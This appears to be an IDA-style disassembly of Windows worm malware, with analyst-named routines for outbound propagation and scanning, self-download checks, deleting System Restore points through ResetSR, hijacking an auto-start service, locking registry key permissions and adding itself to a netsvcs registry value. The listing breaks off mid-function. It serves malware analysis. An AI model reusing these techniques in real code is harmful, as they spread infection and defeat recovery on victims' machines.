xor eax, eax
xor ebx, ebx
mov [ebp+Dst], ebx
lea edi, [ebp+var_1C]
stosd
stosd
mov eax, dword_9BAE64
shr eax, 1
mov dword_9BB2B0, eax
call sub_call_srand_with_seed_from_thread_id
loc_9ADC1E: ; CODE XREF: sub_outbound_propagation+50C�j
mov esi, ds:InternetGetConnectedState
jmp short loc_9ADC31
; ---------------------------------------------------------------------------
loc_9ADC26: ; CODE XREF: sub_outbound_propagation+49�j
push 1388h ; dwMilliseconds
call ds:Sleep
loc_9ADC31: ; CODE XREF: sub_outbound_propagation+33�j
lea eax, [ebp+var_4]
push ebx
push eax
call esi ; InternetGetConnectedState
test eax, eax
jz short loc_9ADC26
loc_9ADC3C: ; CODE XREF: sub_outbound_propagation+6E�j
push 1388h ; dwMilliseconds
call ds:Sleep
lea eax, [ebp+in]
push 100h ; int
push eax ; Dst
call sub_9AC416
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_C], eax
jz short loc_9ADC3C
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe loc_9ADE35
loc_9ADC6F: ; CODE XREF: sub_outbound_propagation+23E�j
lea eax, [eax+eax*2]
shl eax, 2
push [ebp+eax+var_C48]
push [ebp+eax+var_C4C]
push dword ptr [ebp+eax+in.S_un]
lea eax, [ebp+Name]
push offset aL08x08x08x ; "l%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call ds:_snprintf
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialState
push 1 ; bManualReset
push ebx ; lpEventAttributes
mov [ebp+var_29], bl
call ds:CreateEventA
mov esi, eax
cmp esi, ebx
jz loc_9ADE25
call ds:GetLastError
cmp eax, 0B7h
jz loc_9ADE1E
cmp dword_9BB2B8, ebx
jnz loc_9ADDD2
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
push dword ptr [ebp+eax*4+in.S_un]
call sub_check_value_of_hostlong
test eax, eax
pop ecx
jnz loc_9ADDD2
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
push dword ptr [ebp+eax*4+in.S_un] ; in
lea eax, [ebp+var_10]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
call sub_post_and_recv_find_external_adr
add esp, 0Ch
test eax, eax
jz loc_9ADDD2
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
lea eax, [eax+eax*2]
cmp ecx, dword ptr [ebp+eax*4+in.S_un]
jnz loc_9ADDD2
push [ebp+var_10]
call sub_check_for_IP_pattern
test eax, eax
pop ecx
jz loc_9ADDD2
push [ebp+var_10]
call sub_check_value_of_hostlong
test eax, eax
pop ecx
jz loc_9ADDD2
xor ecx, ecx
lea eax, [ebp+in]
loc_9ADD56: ; CODE XREF: sub_outbound_propagation+173�j
mov edx, [eax]
cmp edx, [ebp+var_10]
jz short loc_9ADDD2
inc ecx
add eax, 0Ch
cmp ecx, [ebp+var_C]
jb short loc_9ADD56
push ebx ; in
lea eax, [ebp+var_8]
push eax ; int
xor eax, eax
mov ax, word ptr dword_9BB2F4
mov [ebp+var_8], ebx
push eax ; __int16
call sub_9AA320
add esp, 0Ch
test eax, eax
jz short loc_9ADDD2
cmp word ptr [ebp+var_8], bx
jz short loc_9ADDD2
push [ebp+var_8]
push [ebp+var_10]
call sub_call_download_file_from_given_url_ret_true_if_same_as_own
test eax, eax
pop ecx
pop ecx
jz short loc_9ADDD2
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
shl eax, 2
mov ecx, dword ptr [ebp+eax+in.S_un]
mov [ebp+Dst], ecx
mov ecx, [ebp+eax+var_C4C]
mov eax, [ebp+eax+var_C48]
mov [ebp+var_18], eax
movzx eax, word ptr [ebp+var_8]
mov dword_9BB2BC, eax
mov eax, [ebp+var_10]
mov [ebp+var_1C], ecx
mov dword_9BB2B8, eax
loc_9ADDD2: ; CODE XREF: sub_outbound_propagation+DF�j
; sub_outbound_propagation+FA�j ...
push 18h ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov [eax], esi
mov ecx, [ebp+var_4]
lea esi, [ecx+ecx*2]
lea esi, [ebp+esi*4+in]
lea edi, [eax+4]
movsd
movsd
movsd
mov ecx, dword_9BB2F4
mov [eax+10h], ecx
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AD8BC ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call ds:CreateThread
push eax ; hObject
call ds:CloseHandle
push 32h ; dwMilliseconds
call ds:Sleep
jmp short loc_9ADE25
; ---------------------------------------------------------------------------
loc_9ADE1E: ; CODE XREF: sub_outbound_propagation+D3�j
push esi ; hObject
call ds:CloseHandle
loc_9ADE25: ; CODE XREF: sub_outbound_propagation+C2�j
; sub_outbound_propagation+22B�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb loc_9ADC6F
loc_9ADE35: ; CODE XREF: sub_outbound_propagation+78�j
cmp dword_9BB2B8, ebx
jnz loc_9ADEF1
call sub_download_and_check_my_IP
mov esi, eax
push esi
call sub_check_for_IP_pattern
test eax, eax
pop ecx
jz short loc_9ADE5E
push esi
call sub_check_value_of_hostlong
test eax, eax
pop ecx
jnz short loc_9ADE60
loc_9ADE5E: ; CODE XREF: sub_outbound_propagation+260�j
xor esi, esi
loc_9ADE60: ; CODE XREF: sub_outbound_propagation+26B�j
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe short loc_9ADEE5
loc_9ADE6A: ; CODE XREF: sub_outbound_propagation+2B9�j
lea eax, [eax+eax*2]
push dword ptr [ebp+eax*4+in.S_un]
call sub_check_value_of_hostlong
test eax, eax
pop ecx
jz short loc_9ADEA0
mov eax, [ebp+var_4]
lea ecx, [eax+eax*2]
mov ecx, dword ptr [ebp+ecx*4+in.S_un]
cmp ecx, esi
jz short loc_9ADE93
cmp esi, ebx
jnz short loc_9ADEA3
loc_9ADE93: ; CODE XREF: sub_outbound_propagation+29C�j
push ebx
push ecx
call sub_call_download_file_from_given_url_ret_true_if_same_as_own
test eax, eax
pop ecx
pop ecx
jnz short loc_9ADEAE
loc_9ADEA0: ; CODE XREF: sub_outbound_propagation+28B�j
mov eax, [ebp+var_4]
loc_9ADEA3: ; CODE XREF: sub_outbound_propagation+2A0�j
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb short loc_9ADE6A
jmp short loc_9ADEE5
; ---------------------------------------------------------------------------
loc_9ADEAE: ; CODE XREF: sub_outbound_propagation+2AD�j
mov eax, [ebp+var_4]
lea eax, [eax+eax*2]
shl eax, 2
mov ecx, dword ptr [ebp+eax+in.S_un]
mov edx, [ebp+eax+var_C4C]
mov eax, [ebp+eax+var_C48]
mov [ebp+var_18], eax
mov eax, dword_9BB2F4
mov [ebp+Dst], ecx
mov [ebp+var_1C], edx
mov dword_9BB2BC, eax
mov dword_9BB2B8, ecx
loc_9ADEE5: ; CODE XREF: sub_outbound_propagation+277�j
; sub_outbound_propagation+2BB�j
cmp dword_9BB2B8, ebx
jz loc_9ADF7F
loc_9ADEF1: ; CODE XREF: sub_outbound_propagation+24A�j
push ebx
push dword_9BB2BC
lea eax, [ebp+Name]
push dword_9BB2B8
push offset aW08x08x08x ; "w%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call ds:_snprintf
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialState
push 1 ; bManualReset
push ebx ; lpEventAttributes
mov [ebp+var_29], bl
call ds:CreateEventA
mov esi, eax
cmp esi, ebx
jz short loc_9ADF7F
call ds:GetLastError
cmp eax, 0B7h
jz short loc_9ADF78
push 18h ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov [eax], esi
mov ecx, dword_9BB2B8
mov [eax+4], ecx
mov ecx, dword_9BB2BC
mov [eax+10h], ecx
lea ecx, [ebp+var_4C]
push ecx ; lpThreadId
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AD831 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call ds:CreateThread
push eax ; hObject
call ds:CloseHandle
push 32h ; dwMilliseconds
call ds:Sleep
jmp short loc_9ADF7F
; ---------------------------------------------------------------------------
loc_9ADF78: ; CODE XREF: sub_outbound_propagation+343�j
push esi ; hObject
call ds:CloseHandle
loc_9ADF7F: ; CODE XREF: sub_outbound_propagation+2FA�j
; sub_outbound_propagation+336�j ...
mov [ebp+var_14], 1
loc_9ADF86: ; CODE XREF: sub_outbound_propagation+506�j
push 4E20h ; dwMilliseconds
call ds:Sleep
lea eax, [ebp+var_1850]
push 100h ; int
push eax ; Dst
call sub_9AC416
cmp eax, [ebp+var_C]
pop ecx
pop ecx
mov [ebp+var_24], eax
jz short loc_9ADFAF
mov [ebp+var_14], ebx
loc_9ADFAF: ; CODE XREF: sub_outbound_propagation+3B9�j
xor eax, eax
cmp [ebp+var_C], ebx
mov [ebp+var_4], eax
jbe loc_9AE0F4
loc_9ADFBD: ; CODE XREF: sub_outbound_propagation+4FD�j
cmp [ebp+var_24], ebx
mov [ebp+var_8], ebx
jbe short loc_9AE006
lea ecx, [eax+eax*2]
shl ecx, 2
mov esi, dword ptr [ebp+ecx+in.S_un]
lea edx, [ebp+var_184C]
loc_9ADFD8: ; CODE XREF: sub_outbound_propagation+413�j
cmp [edx-4], esi
jnz short loc_9ADFF8
mov edi, [edx]
cmp edi, [ebp+ecx+var_C4C]
jnz short loc_9ADFF8
mov edi, [edx+4]
cmp edi, [ebp+ecx+var_C48]
jz loc_9AE0E7
loc_9ADFF8: ; CODE XREF: sub_outbound_propagation+3EA�j
; sub_outbound_propagation+3F5�j
mov edi, [ebp+var_24]
inc [ebp+var_8]
add edx, 0Ch
cmp [ebp+var_8], edi
jb short loc_9ADFD8
loc_9AE006: ; CODE XREF: sub_outbound_propagation+3D2�j
lea eax, [eax+eax*2]
shl eax, 2
push [ebp+eax+var_C48]
push [ebp+eax+var_C4C]
push dword ptr [ebp+eax+in.S_un]
lea eax, [ebp+Name]
push offset aL08x08x08x ; "l%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call ds:_snprintf
mov esi, ds:OpenEventA
add esp, 18h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInheritHandle
push 2 ; dwDesiredAccess
mov [ebp+var_29], bl
call esi ; OpenEventA
mov edi, eax
cmp edi, ebx
jz short loc_9AE05B
push edi ; hEvent
call ds:SetEvent
push edi ; hObject
call ds:CloseHandle
loc_9AE05B: ; CODE XREF: sub_outbound_propagation+45A�j
mov eax, [ebp+var_4]
mov edx, [ebp+Dst]
lea ecx, [eax+eax*2]
shl ecx, 2
cmp edx, dword ptr [ebp+ecx+in.S_un]
jnz short loc_9AE0E4
mov edx, [ebp+var_1C]
cmp edx, [ebp+ecx+var_C4C]
jnz short loc_9AE0E4
mov edx, [ebp+var_18]
cmp edx, [ebp+ecx+var_C48]
jnz short loc_9AE0E4
push 0Ch ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
push ebx
push dword_9BB2BC
lea eax, [ebp+Name]
push dword_9BB2B8
push offset aW08x08x08x ; "w%08x%08x%08x"
push 20h ; Count
push eax ; Dest
call ds:_snprintf
add esp, 24h
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInheritHandle
push 2 ; dwDesiredAccess
mov [ebp+var_29], bl
call esi ; OpenEventA
mov esi, eax
cmp esi, ebx
jz short loc_9AE0D5
push esi ; hEvent
call ds:SetEvent
push esi ; hObject
call ds:CloseHandle
loc_9AE0D5: ; CODE XREF: sub_outbound_propagation+4D4�j
push ebx ; Value
push offset dword_9BB2B8 ; Target
call ds:InterlockedExchange
mov eax, [ebp+var_4]
loc_9AE0E4: ; CODE XREF: sub_outbound_propagation+47D�j
; sub_outbound_propagation+489�j ...
mov [ebp+var_14], ebx
loc_9AE0E7: ; CODE XREF: sub_outbound_propagation+401�j
inc eax
cmp eax, [ebp+var_C]
mov [ebp+var_4], eax
jb loc_9ADFBD
loc_9AE0F4: ; CODE XREF: sub_outbound_propagation+3C6�j
cmp [ebp+var_14], ebx
jnz loc_9ADF86
jmp loc_9ADC1E
sub_outbound_propagation endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_outbound_scans proc near ; CODE XREF: StartAddress+1AD�p
ThreadId = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ds:CreateThread
push edi
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor ebx, ebx
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_check_time_last_input ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
mov edi, ds:CloseHandle
push eax ; hObject
call edi ; CloseHandle
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset sub_outbound_propagation ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call esi ; CreateThread
push eax ; hObject
call edi ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_outbound_scans endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE140 proc near ; CODE XREF: sub_setup_run_dll32_and_netsvc:loc_9AEA37�p
var_20 = dword ptr -20h
hLibModule = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_9A4650
call __SEH_prolog
push offset LibFileName ; "srclient.dll"
call ds:LoadLibraryA
mov [ebp+hLibModule], eax
and [ebp+ms_exc.disabled], 0
test eax, eax
jz short loc_9AE182
push offset aResetsr ; "ResetSR"
push eax ; hModule
call ds:GetProcAddress
mov [ebp+var_20], eax
test eax, eax
jz short loc_9AE182
push 0
call eax
jmp short loc_9AE182
; ---------------------------------------------------------------------------
loc_9AE17B: ; DATA XREF: .text:stru_9A4650�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AE17F: ; DATA XREF: .text:stru_9A4650�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AE182: ; CODE XREF: sub_9AE140+20�j
; sub_9AE140+33�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push [ebp+hLibModule] ; hLibModule
call ds:FreeLibrary
call __SEH_epilog
retn
sub_9AE140 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AE195 proc near ; CODE XREF: sub_setup_run_dll32_and_netsvc+3C�p
Buffer = _QUERY_SERVICE_CONFIGW ptr -2050h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
ResumeHandle = dword ptr -3Ch
var_38 = dword ptr -38h
pcbBytesNeeded = dword ptr -34h
hSCObject = dword ptr -30h
ServicesReturned= dword ptr -2Ch
var_28 = dword ptr -28h
dwBytes = dword ptr -24h
var_20 = dword ptr -20h
hMem = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_9A4660
push offset unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 2038h
call __alloca_probe
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_40], ebx
mov [ebp+var_4], ebx
push 20005h ; dwDesiredAccess
push ebx ; lpDatabaseName
push ebx ; lpMachineName
call ds:OpenSCManagerW
mov [ebp+hSCObject], eax
cmp eax, ebx
jz loc_9AE36F
mov [ebp+dwBytes], ebx
mov [ebp+ServicesReturned], ebx
mov [ebp+ResumeHandle], ebx
mov [ebp+hMem], ebx
mov esi, ds:GlobalAlloc
loc_9AE1F6: ; CODE XREF: sub_9AE195+B3�j
lea eax, [ebp+ResumeHandle]
push eax ; lpResumeHandle
lea eax, [ebp+ServicesReturned]
push eax ; lpServicesReturned
lea eax, [ebp+dwBytes]
push eax ; pcbBytesNeeded
push [ebp+dwBytes] ; cbBufSize
push [ebp+hMem] ; lpServices
push 3 ; dwServiceState
push 30h ; dwServiceType
push [ebp+hSCObject] ; hSCManager
call ds:EnumServicesStatusW
mov [ebp+var_44], eax
cmp eax, ebx
jnz short loc_9AE24A
call ds:GetLastError
cmp eax, 0EAh
jnz short loc_9AE24A
cmp [ebp+hMem], ebx
jz short loc_9AE237
push [ebp+hMem] ; hMem
call ds:GlobalFree
loc_9AE237: ; CODE XREF: sub_9AE195+97�j
push [ebp+dwBytes] ; dwBytes
push 40h ; uFlags
call esi ; GlobalAlloc
mov [ebp+hMem], eax
cmp eax, ebx
jz short loc_9AE24A
mov [ebp+ResumeHandle], ebx
jmp short loc_9AE1F6
; ---------------------------------------------------------------------------
loc_9AE24A: ; CODE XREF: sub_9AE195+85�j
; sub_9AE195+92�j ...
cmp [ebp+var_44], ebx
jz loc_9AE35D
cmp [ebp+hMem], ebx
jz loc_9AE35D
mov eax, [ebp+ServicesReturned]
shl eax, 2
push eax ; dwBytes
push 40h ; uFlags
call esi ; GlobalAlloc
mov edi, eax
mov [ebp+var_50], edi
mov [ebp+var_20], ebx
or [ebp+var_38], 0FFFFFFFFh
xor esi, esi
loc_9AE275: ; CODE XREF: sub_9AE195+187�j
mov [ebp+var_28], esi
cmp esi, [ebp+ServicesReturned]
jnb loc_9AE321
push 20005h ; dwDesiredAccess
lea eax, [esi+esi*8]
mov ecx, [ebp+hMem]
push dword ptr [ecx+eax*4] ; lpServiceName
push [ebp+hSCObject] ; hSCManager
call ds:OpenServiceW
mov ebx, eax
mov [ebp+var_48], ebx
test ebx, ebx
jz short loc_9AE319
lea eax, [ebp+pcbBytesNeeded]
push eax ; pcbBytesNeeded
push 2000h ; cbBufSize
lea eax, [ebp+Buffer]
push eax ; lpServiceConfig
push ebx ; hService
call ds:QueryServiceConfigW
test eax, eax
jz short loc_9AE312
cmp [ebp+Buffer.dwStartType], 2
jnz short loc_9AE312
lea eax, [ebp+pcbBytesNeeded]
push eax ; pcbBytesNeeded
push 2000h ; cbBufSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 1 ; dwInfoLevel
push ebx ; hService
call ds:QueryServiceConfig2W
test eax, eax
jz short loc_9AE312
cmp [ebp+pcbBytesNeeded], 0
jz short loc_9AE312
lea eax, [ebp+Buffer]
mov [ebp+var_4C], eax
mov eax, [ebp+Buffer.dwServiceType]
test eax, eax
jz short loc_9AE312
cmp word ptr [eax], 0
jz short loc_9AE312
push eax ; Str
call ds:_wcsdup
pop ecx
mov ecx, [ebp+var_20]
mov [edi+ecx*4], eax
inc [ebp+var_20]
loc_9AE312: ; CODE XREF: sub_9AE195+125�j
; sub_9AE195+12E�j ...
push ebx ; hSCObject
call ds:CloseServiceHandle
loc_9AE319: ; CODE XREF: sub_9AE195+10A�j
inc esi
xor ebx, ebx
jmp loc_9AE275
; ---------------------------------------------------------------------------
loc_9AE321: ; CODE XREF: sub_9AE195+E6�j
cmp [ebp+var_20], ebx
jz short loc_9AE33A
call ds:rand
xor edx, edx
div [ebp+var_20]
mov [ebp+var_38], edx
mov eax, [edi+edx*4]
mov [ebp+var_40], eax
loc_9AE33A: ; CODE XREF: sub_9AE195+18F�j
xor esi, esi
loc_9AE33C: ; CODE XREF: sub_9AE195+1BF�j
mov [ebp+var_28], esi
cmp esi, [ebp+var_20]
jnb short loc_9AE356
cmp [ebp+var_38], esi
jz short loc_9AE353
push dword ptr [edi+esi*4] ; Memory
call ds:free
pop ecx
loc_9AE353: ; CODE XREF: sub_9AE195+1B2�j
inc esi
jmp short loc_9AE33C
; ---------------------------------------------------------------------------
loc_9AE356: ; CODE XREF: sub_9AE195+1AD�j
push edi ; hMem
call ds:GlobalFree
loc_9AE35D: ; CODE XREF: sub_9AE195+B8�j
; sub_9AE195+C1�j
push [ebp+hMem] ; hMem
call ds:GlobalFree
push [ebp+hSCObject] ; hSCObject
call ds:CloseServiceHandle
loc_9AE36F: ; CODE XREF: sub_9AE195+49�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_9AE382
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor ebx, ebx
loc_9AE382: ; CODE XREF: sub_9AE195+1DE�j
mov eax, [ebp+var_40]
cmp eax, ebx
jnz short loc_9AE395
push offset Str ; Str
call ds:_wcsdup
pop ecx
loc_9AE395: ; CODE XREF: sub_9AE195+1F2�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_9AE195 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE3A4(HKEY hKey)
sub_9AE3A4 proc near ; CODE XREF: sub_9AE496+80�p
pSecurityDescriptor= byte ptr -48h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
pSid = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
hKey = dword ptr 8
push 38h
push offset stru_9A4670
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_24], ebx
mov [ebp+var_20], ebx
mov [ebp+pSid], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 5
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push 12h ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call ds:AllocateAndInitializeSid
push [ebp+pSid] ; pSid
call ds:GetLengthSid
mov esi, eax
add esi, 10h
mov [ebp+var_28], esi
push esi ; dwBytes
push 40h ; uFlags
call ds:GlobalAlloc
mov edi, eax
mov [ebp+var_20], edi
cmp edi, ebx
jz short loc_9AE45E
push 2 ; dwAclRevision
push esi ; nAclLength
push edi ; pAcl
call ds:InitializeAcl
push [ebp+pSid] ; pSid
push 20019h ; AccessMask
push 2 ; dwAceRevision
push edi ; pAcl
call ds:AddAccessAllowedAce
push 1 ; dwRevision
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call ds:InitializeSecurityDescriptor
push ebx ; bDaclDefaulted
push edi ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call ds:SetSecurityDescriptorDacl
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
push 4 ; SecurityInformation
push [ebp+hKey] ; hKey
call ds:RegSetKeySecurity
mov [ebp+var_2C], eax
xor ecx, ecx
cmp eax, ebx
setz cl
mov [ebp+var_24], ecx
loc_9AE45E: ; CODE XREF: sub_9AE3A4+67�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AE474
; ---------------------------------------------------------------------------
loc_9AE464: ; DATA XREF: .text:stru_9A4670�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AE468: ; DATA XREF: .text:stru_9A4670�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor ebx, ebx
mov edi, [ebp+var_20]
loc_9AE474: ; CODE XREF: sub_9AE3A4+BE�j
cmp edi, ebx
jz short loc_9AE47F
push edi ; hMem
call ds:GlobalFree
loc_9AE47F: ; CODE XREF: sub_9AE3A4+D2�j
cmp [ebp+pSid], ebx
jz short loc_9AE48D
push [ebp+pSid] ; pSid
call ds:FreeSid
loc_9AE48D: ; CODE XREF: sub_9AE3A4+DE�j
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_9AE3A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE496(HKEY hKey)
sub_9AE496 proc near ; CODE XREF: sub_9AE496+49�p
; sub_9AE641+1E8�p
Name = word ptr -214h
phkResult = dword ptr -0Ch
cchName = dword ptr -8
dwIndex = dword ptr -4
hKey = dword ptr 8
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
mov edi, ds:RegEnumKeyExW
xor esi, esi
push esi
push esi
push esi
push esi
lea eax, [ebp+cchName]
push eax
lea eax, [ebp+Name]
push eax
mov [ebp+dwIndex], esi
push esi
jmp short loc_9AE503
; ---------------------------------------------------------------------------
loc_9AE4BE: ; CODE XREF: sub_9AE496+7B�j
lea eax, [ebp+phkResult]
push eax ; phkResult
push 0F003Fh ; samDesired
push esi ; ulOptions
lea eax, [ebp+Name]
push eax ; lpSubKey
push [ebp+hKey] ; hKey
call ds:RegOpenKeyExW
test eax, eax
jnz short loc_9AE4EE
push [ebp+phkResult] ; hKey
call sub_9AE496
pop ecx
push [ebp+phkResult] ; hKey
call ds:RegCloseKey
loc_9AE4EE: ; CODE XREF: sub_9AE496+44�j
inc [ebp+dwIndex]
push esi ; lpftLastWriteTime
push esi ; lpcchClass
push esi ; lpClass
push esi ; lpReserved
lea eax, [ebp+cchName]
push eax ; lpcchName
lea eax, [ebp+Name]
push eax ; lpName
push [ebp+dwIndex] ; dwIndex
loc_9AE503: ; CODE XREF: sub_9AE496+26�j
push [ebp+hKey] ; hKey
mov [ebp+cchName], 104h
call edi ; RegEnumKeyExW
test eax, eax
jz short loc_9AE4BE
push [ebp+hKey] ; hKey
call sub_9AE3A4
pop ecx
pop edi
pop esi
leave
retn
sub_9AE496 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE520(wchar_t *Src,LPCWSTR lpValueName)
sub_9AE520 proc near ; CODE XREF: sub_9AE641+1D2�p
SubKey = word ptr -88h
Type = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Data = byte ptr -9
hKey = dword ptr -8
cbData = dword ptr -4
Src = dword ptr 8
lpValueName = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1Ah
pop ecx
mov esi, offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
lea edi, [ebp+SubKey]
rep movsd
lea eax, [ebp+hKey]
push eax ; phkResult
push 3 ; samDesired
xor ebx, ebx
push ebx ; ulOptions
lea eax, [ebp+SubKey]
push eax ; lpSubKey
push 80000002h ; hKey
mov [ebp+var_10], ebx
movsw
call ds:RegOpenKeyExW
test eax, eax
jnz loc_9AE639
mov esi, ds:RegQueryValueExW
lea eax, [ebp+cbData]
push eax ; lpcbData
lea eax, [ebp+Data]
push eax ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push ebx ; lpReserved
push [ebp+lpValueName] ; lpValueName
mov [ebp+cbData], 1
push [ebp+hKey] ; hKey
mov [ebp+Type], 7
call esi ; RegQueryValueExW
cmp eax, 0EAh
jnz loc_9AE630
push [ebp+Src] ; Str
mov edi, ds:wcslen
call edi ; wcslen
pop ecx
mov ecx, [ebp+cbData]
lea eax, [ecx+eax*2+2]
push eax ; dwBytes
push 40h ; uFlags
mov [ebp+var_18], eax
call ds:GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9AE630
lea eax, [ebp+cbData]
push eax ; lpcbData
push ebx ; lpData
lea eax, [ebp+var_14]
push eax ; lpType
push 0 ; lpReserved
push [ebp+lpValueName] ; lpValueName
mov [ebp+var_14], 7
push [ebp+hKey] ; hKey
call esi ; RegQueryValueExW
test eax, eax
jnz short loc_9AE629
mov esi, [ebp+cbData]
push [ebp+Src] ; Str
shr esi, 1
dec esi
call edi ; wcslen
lea edi, [eax+eax+2]
push edi ; Size
push [ebp+Src] ; Src
add esi, esi
lea eax, [esi+ebx]
push eax ; Dst
call memcpy
push 2 ; Size
add esi, edi
push 0 ; Val
add esi, ebx
push esi ; Dst
call memset
add esp, 1Ch
push [ebp+var_18] ; cbData
push ebx ; lpData
push 7 ; dwType
push 0 ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call ds:RegSetValueExW
test eax, eax
jnz short loc_9AE629
mov [ebp+var_10], 1
loc_9AE629: ; CODE XREF: sub_9AE520+B9�j
; sub_9AE520+100�j
push ebx ; hMem
call ds:GlobalFree
loc_9AE630: ; CODE XREF: sub_9AE520+72�j
; sub_9AE520+9B�j
push [ebp+hKey] ; hKey
call ds:RegCloseKey
loc_9AE639: ; CODE XREF: sub_9AE520+3E�j
mov eax, [ebp+var_10]
pop edi
pop esi
pop ebx
leave
retn
sub_9AE520 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AE641(int,wchar_t *Src,BYTE *lpData,wchar_t *lpValueName,int)
sub_9AE641 proc near ; CODE XREF: sub_setup_run_dll32_and_netsvc+104�p
Source = word ptr -0ACh
var_60 = byte ptr -60h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
phkResult = dword ptr -10h
hMem = dword ptr -0Ch
Data = byte ptr -8
hKey = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
lpData = dword ptr 10h
lpValueName = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0ACh
and [ebp+var_14], 0
